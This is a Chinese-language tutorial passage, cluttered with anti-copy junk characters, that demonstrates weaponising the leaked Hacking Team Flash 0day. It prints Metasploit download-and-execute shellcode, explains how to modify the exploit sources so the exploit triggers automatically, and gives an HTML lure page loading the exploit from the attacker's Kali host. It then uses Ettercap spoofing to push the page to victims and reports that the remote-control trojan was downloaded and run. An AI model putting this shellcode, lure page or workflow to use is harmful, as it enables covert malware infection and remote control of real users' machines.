: K! S: w9 D c' `6 ^1 Z6 a' K! V
三、flash 0day之手工代码修改制作下载者实例入侵演示 . p# e3 J7 U1 l( N0 x3 n$ {; S
# B: o. o `2 `# O8 a6 r% T, d
5 }+ B0 F0 @: E! I3 O7 @
利用到的工具: 1 T* _# t K6 p1 p% j M
" E; N2 ^ h; J( k% ?3 K3 R6 {# g, g+ h( E I7 P! s/ G
Msf
( u) M. H) p0 r- U9 g) q6 H - P, S! ?" l" q/ m& q. O& Z6 Y; U
# U7 ~& d$ Z& l5 o
Ettercap 1 c3 H/ w# K7 u) |" X
1 t2 [8 r+ c7 o! {: p: P( {" d
" V6 g2 q: K- a l {" v
Adobe Flash CS6
+ W( s7 Q b5 E : b4 `1 R/ p! ?
$ {8 N' ^; o; L+ @ ]4 z F2 l
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
) k1 ~7 }# C3 l2 R4 h' ~ 7 T/ g! G. H) S) w2 ^4 S" m- f* e
D$ f4 p m3 E. H: Q5 ]; p: T 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
" u) J: J! @$ p3 X$ @
3 @1 k8 U+ r$ d. \( @5 `
* ~. E; y4 j5 f7 V7 Q/ E8 B9 ` 如图:
) O! g1 i* r$ A$ |: T) L
) G2 D0 k8 `+ R% [7 Q5 s5 X5 N( S* X! }: |
% F) j$ a) q% ~# ?
6 j8 N# r$ ~# X; S! M2 I" d
6 x/ p9 ]8 z9 d4 [ z+ y1 V 3 u7 q4 O3 T, K
6 A) B" k$ k) P2 B" Q# E1 M2 r# L! G- _. J8 T3 I
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
8 g/ a, Z7 u T3 Z- d5 v' ?$ E
4 h' V I! I0 q* v
0 i2 Q/ E5 L( \5 q9 o ' @3 H8 n! `1 J) r2 V" u
0 j5 L# V" k* l1 y
8 C6 Z, a1 \0 G! W/ v " _# H, A! [5 D2 O. K
' ]5 z y/ Z2 k% l" f
& Y h: C. A" C8 |, H& @, i0 x 然后执行generate -t dword生成shellcode,如下:
+ ^1 s, Z1 \+ S4 i% F ( k6 u+ ~% C# a2 _ E/ s$ q
8 L# J# v: r/ }3 i& `8 ]
$ @9 G& r! p( S1 v2 k. Y( l- M R
, \, |$ a9 M3 V8 u% C; l
! ]' n) b& G$ L/ a) X0 Y- C
复制代码到文本下便于我们一会编辑flash exp,如下:
% ~9 A$ F \; v . d, J5 ?1 d+ O7 G7 ^9 m
' I) G o& C! p2 _6 b8 T u4 ]
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
+ t! n. B, j- s- h; I5 T5 E+ H) R
; `7 w% R" d$ D! C4 w) R. V3 B
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, # Y. O# g3 V) E( r7 C1 q
2 |/ V# Q/ h( V9 p: Y3 b4 h* n' B
* T: j8 f4 P# T6 C# A8 y* O 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
4 ] S* ?) ]/ \/ D ) d$ @% g5 j+ n7 W1 f
9 x" _6 w5 ?8 b, `7 v* T. |; Z
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ) {' T- g' @7 y ^6 P! e
. V! q$ g/ E/ {8 }9 d8 t$ U/ u- |' u4 w/ k- k Z
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
' e8 ~/ C3 d1 m) b
! _2 j5 Q, K; ~
$ x* ]0 u4 Q8 S6 n) Y: {7 Z2 s 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
0 c4 {" \+ ~: K0 T$ A- Z4 d
6 t# t- ~8 B% g. O8 s
% s7 X* v$ i/ ~& l* o ` 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
( ^2 {+ \1 X; s2 i: H' \' m4 k
6 ^( g7 a% K' j# i! o5 r- Q5 w1 b) m
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, . Z5 t* \ _( h& T& }5 j* r
" |& G' W! y6 S& Q4 g! V" Y) G$ ^; C
) O$ H* D) J! j 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ( ]* b" K; o" v6 Z- x
6 b+ @8 Y' x' H
$ }) ^, P2 w: [( { 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, , n. x7 W9 B- \' S5 {
5 D. M: S2 @! T: w l) O. X+ `& G! q/ ^
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
- n8 P$ c& [" A 1 U: }6 v7 }' E3 q
; h/ b( O; t8 m- W' m& [
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, & b; e; y# \/ V. }" t( |4 R* ^
" d1 H, K& {2 [' a' x- }) s. k
D5 u- d H* N" S+ o# E$ z3 ]$ i 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
* z) v9 s2 j2 |( D1 g8 X. \ 6 P( k: T0 I: D8 k5 ?) O
% Y* q7 t& F- c4 ^1 ]4 l 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 * \$ S/ a* R+ r
9 c1 P' F! Z4 c6 c, x: z4 J* N! x1 ~/ c' c
! L- y, t+ y/ g % P+ X( J* z E M* m& z+ N
7 E1 }& Y& } i4 h# d
) l ~- n( `6 m ( g' V9 c3 ?# E9 Q' P1 O D: W5 A& d
; L& m2 u: p* k 下面我们来修改flash 0day exp,需要修改三个文件,分别为: , m9 R3 l. c5 i! D* w* I
, U; p3 I6 D2 z F$ d$ x' h
- Q( q: n/ f7 d3 P9 T: n 7 Q9 I( o0 O+ `% N# H. p8 b
w2 }6 e9 X3 T$ |0 D2 p" x8 N% \* z& k' _
先修改ShellWin32.as,部分源代码如图:
* \( Y6 H+ E; @8 N/ p I0 o; ?4 J: g
0 X0 _6 b2 M+ M3 d9 ?7 d1 w
( V: i& p4 s" i
% O9 x# e- R% _: Q! S5 G; t
3 H- g+ {# u! r! Y# [7 O
0 `: M/ u) @& T9 Z 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
' Q$ e; s. b! W" L, Q& Y
2 s2 R; a$ W& E; i: q' C% _$ p Z
, r5 s3 D% H: [; j3 Y 6 z& q2 e6 c" H; z0 _- Q" j+ O5 w
. ]8 V& a" r6 v5 M; j 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
! g0 {# s7 P5 x! y1 Q; k 6 ^0 g N3 h2 h" B; C2 P* X
# S+ g# ]: X7 C1 k. e- C0 |
4 m; F( O/ \9 p, Y' x 9 @' |7 h! c6 X, G& y4 w
0 i/ v2 `7 U& \3 S# {+ s8 G 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
6 v: V9 o( [8 A. q0 L $ M6 y. @2 }8 n7 U7 y4 j5 c" j S
7 ~0 E4 U1 a x. X8 }7 k
3 f$ ~6 V+ h: l8 \9 |. m
/ |8 P0 B, n8 w3 W s' }) \4 K$ [
' P) M9 r; R2 Q( @5 s4 Y 2 y& K6 H; A' T F& y) ?* ]
$ f% \/ G* U( P ^$ D5 _/ O$ {4 Y6 g7 }* C# S
+ R& [; y" y( E* ^" k+ r7 u
|- `+ [, [5 P# m; O6 u' C+ C% C8 a" }& u
然后点保存,下面我们来编译一下,打开
: w' }9 S$ ~2 O
7 p6 C! `- f4 l, m3 W* c0 O+ X( V3 ~+ z! W" J! `
exp1.fla然后点文件-发布,看看编译没错误
+ b) o6 S) x. n& W; B7 ?
% |& x; S( X3 c+ |+ ]' s8 j) R2 y% W( w. [
' ?! v5 L) N3 [6 J8 m i) G8 U
. j \2 k5 b2 i2 @/ X# e( g, a
5 `% N# {& }; _3 ?& Q I( Q# R3 m/ u, Q7 R
5 z" d( j1 j1 `! ?* D, ?! J. N& u& @7 W5 `6 k
# H' K& x# x0 v; B 4 B- ]& L4 _8 w' H9 H* n$ j! s
+ W; ?. A X1 t9 w
" x5 I$ K" R3 N- F/ x, z2 u0 [
1 ~1 h& a5 ]" x% [2 q
7 I5 n0 a% }% F3 } g& e4 _ 然后我们把生成的 " \) X. [) V* f
& Q3 H- D* T7 t/ ]
) n* a; {: J2 b9 c2 O6 G3 ^, e exp1.swf丢到kailinux 的/var/www/html下:
! Z% s; H& D$ s( J( v! _8 B 1 W, F* S$ W1 f* W* K0 @# o
/ @8 C3 t% E: K9 S" }
然后把这段代码好好编辑一下 . a. @' }7 g" g2 i
( v# \: ^% g v& u# m: {+ y
5 B1 O! `3 a: q( c
e9 J/ @9 K" g* b6 z! c: I1 C. l( Y0 U
% e& U$ [, C% D5 G9 c1 m
7 ^3 [2 V, ~' U V9 T
8 `/ t/ n+ ?9 a- h " p9 M% L6 n3 n& [( B
: N' l' v3 F* U: E) w/ R. k1 Y
7 t) S2 D7 O# h# X$ I
: v1 p |4 ^# l. P) |2 G% g0 ?# B' ~4 {% t5 o) R9 s; Q, ^( L) ~
# Q. V* ?9 U! g- z 9 a, u" L& L6 m
3 u z: Y; F# C! T" u9 S4 W
" T9 M0 R1 L0 A6 W
6 p% p8 b# o: V7 d0 `. k& D$ Z' l p
: F5 u0 s+ s2 ]) v
; K0 @7 o7 h6 a+ O2 S) f 0 ^2 c& P/ k7 C) t5 d* R8 J7 W
! `0 z6 C1 T+ f4 `1 e7 ?* C <!DOCTYPE html>
8 c) p0 S! f% {$ J
0 O. H4 I" b, p2 k" ^; N U- d g) F) f+ e0 r1 r5 Y
<html> . p9 O" J2 {& r/ l
; G+ I2 m& t) Q
7 o; T% p/ [& d* j6 p
<head>
" d1 v8 Y# b2 I . b3 H; x+ [4 |; k- T1 |# K
4 I5 c& Y1 M9 R3 N) s) `1 | <meta http-equiv="Content-Type" content="text/html; & x% I0 e: }4 C: k; K* g4 R% F4 G
; ~# u. }" S8 R2 d& L
; V7 h5 }: d1 i
charset=utf-8"/> 1 [8 m# `. R& {% j: }
- W; S4 q$ f, z# T0 H& Z( G
H6 x+ X; B$ J& P8 `5 @ </head>
6 {8 i5 b w2 Z5 g: S 4 N% l1 H3 r$ A# Y& q
1 k) D3 V% n) H( h <body> , Q i: u' r+ t$ a! {
; Q: U1 |: P0 T5 O
[& v; j: c6 N- I( Y <h2> Please wait, the requested page is loading...</h2>
$ y0 q) J+ v# w+ o, f. q r2 h 8 D# p& j! h1 }2 i: V
# Q# `& z' X$ t/ X' \
<br>
# t: u0 R- Q$ u
7 V9 Q Z- g4 p# }, B( }+ Z: ~' i4 f2 `: d8 Q
<OBJECT ! L# i+ v5 V, N2 \
' i8 {+ V) d; A3 ~
4 f& r: O, a% e+ v
classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie
2 y6 b, C0 u. _$ r: y3 L 7 ~" \ I9 P: e
. T1 u- Z; s* s* N& v6 f9 g3 V) Q VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 0 q7 P8 T0 |8 u4 L% S
2 v: ]. N7 V S4 }. Y1 [# r) ]3 d* W' I! |' Z
</body> / t' V+ E p* J2 S3 \. ~! w
% n3 i5 c: b7 I+ d4 Q) h) M) h4 N; T. [% ]
<script> ) n8 n6 r& B# `. U1 K& b
# e; N% m1 H* C$ j5 \# M2 a: L" [* a; |8 b+ M. }# U! }* P
setTimeout(function () { % t' a- q k) f! c; f$ g
& R5 A* A6 k* y5 j( q" j$ V! @0 @5 C. q% c( P! `. E1 K
" D- b+ }" i5 }" s# p; I: M
! b9 C4 F3 q' k4 _5 }( z h* N) r2 G0 E3 ~+ x0 m
window.location.reload();
/ ~4 r5 S; e$ p! ]: r" p6 q; S , s9 ~$ f7 n0 ^9 D- O
* r, T+ Z, W* ~. p; _9 @& ?
}, 10000); 0 L! Q k2 q, ~+ T a' c2 z/ r
) I$ L& \% Y0 Z7 h
: B3 _) G9 Z6 c" ~) @! ` , f" A. i- ~$ l4 I( b2 f) D
& s" M4 Z$ J; P3 R
) I$ Y& V" G& r7 r* Q( F( A </script> 2 F7 _: @' L5 T8 S7 f; {( J
- @* t0 t B6 R0 V
1 S8 n4 k! L, X q8 _/ T2 h& ? Q </html>
* _4 M+ I y. x" _5 Z/ ? 5 `5 ~+ Y' y+ m3 x
+ _ v' n% J2 i! l6 K
- g! k6 Z: Y" E- ^
J1 K, ]+ j H+ h) U h2 D0 |
( c. |+ o3 p. q6 f
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
) x! ~; u- v, G$ S& }# U. ]' M
# @ m( k; X- o* W; c: Z" j7 k# A1 G* e/ k3 W
4 k: l2 l7 U- x8 L5 H7 v) s
8 S0 e4 ^/ s5 k2 A
; U4 T% l1 @, Z- m' {; k4 j2 v) P7 _
5 I5 D4 Q/ ~) ?) f" z# Y5 r * y5 X- ~4 H- m- z6 I3 c- o
6 L$ e: y2 d5 S
( F; P4 [- m5 D W1 r
* o2 y$ F: Y. [. C- X
- m+ {$ x( u* R* Y& e5 s$ M' @ # ]9 m) Z# w: y0 U! _! ^, e
7 M. E2 K+ K( D. w: i& L: C
$ Y0 f4 y7 l6 N7 [
& N7 C# v9 Y7 H, l: _* y+ i- ~
( O7 |. }. S% R# `1 K: m* V! x" C8 B" i# g' z
下面我们用ettercap欺骗如图:
0 p5 t! q) ?* `1 T9 z# @ 5 k# v' ~, r/ b+ D: ~ y9 M, r
# S7 c# o7 a" f: @# D
8 D; J4 z$ D( [9 ^ p6 Y
8 E1 Q- ~6 G. k
( ~' m# d" H( [ C. q
/ [# Z- F+ ?7 c) _/ B* g- i . M7 J6 E4 P: f! O# i$ X- {
) }; _2 T' Z0 Z! S2 ] 下面我们随便访问个网站看看:
- M6 b2 A2 ~+ p( J
- T( x4 J( b/ C2 ^, g( B; h4 G* E$ A! a' [' N ?0 o- b8 ?
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
, J( q7 M* z; d$ p8 G
4 h4 n. A9 D* V W! U
6 S _ ? T% E: p ( h' x0 n1 L- S, @- @( ?
1 M. H3 r' t; S- i x' C$ Q, x) s9 I9 `1 }4 D$ D, X
我们看另一台, 0 I! q3 R3 D5 h" |# b
8 S1 b; G6 c2 }1 G* i) C) t
# p7 R! V1 x4 F8 { Y 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 * ]! N- t! V( t) A8 m, z( Y2 x
|